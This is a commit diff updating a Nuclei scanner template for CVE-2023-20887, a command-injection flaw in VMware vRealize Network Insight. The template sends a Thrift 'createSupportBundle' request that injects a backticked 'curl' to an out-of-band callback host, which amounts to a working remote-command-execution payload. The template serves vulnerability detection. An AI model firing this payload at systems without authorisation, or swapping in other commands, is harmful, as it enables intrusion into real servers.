Merge pull request #7411 from projectdiscovery/princechaddha-patch-6

Updated CVE-2023-20887
2023-06-15 11:53:57 +05:30 · 2023-06-15 11:53:57 +05:30 · 85762056d9
parent e9f340fe5f 083fe1b839
commit 85762056d9
1 changed files with 17 additions and 7 deletions
--- a/http/cves/2023/CVE-2023-20887.yaml
+++ b/http/cves/2023/CVE-2023-20887.yaml
@ -24,6 +24,9 @@ info:
    fofa-query: title="VMware vRealize Network Insight"
  tags: cve,cve2023,vmware,rce,msf,vrealize,insight,oast

+variables:
+  cmd: "curl {{interactsh-url}}"
+
 http:
  - raw:
      - |
@ -31,20 +34,27 @@ http:
        Host: {{Hostname}}
        Content-Type: application/x-thrift

-        [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl {{interactsh-url}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]
+        [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`{{cmd}}`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}]

    matchers-condition: and
    matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "http"
-
      - type: word
        part: body
        words:
-          - createSupportBundle
+          - '{"rec":'
+
+      - type: word
+        part: header
+        words:
+          - "application/x-thrift"

      - type: status
        status:
          - 200
+
+      - type: word
+        part: body
+        words:
+          - "Provided invalid node Id"
+          - "Invalid nodeId"
+        negative: true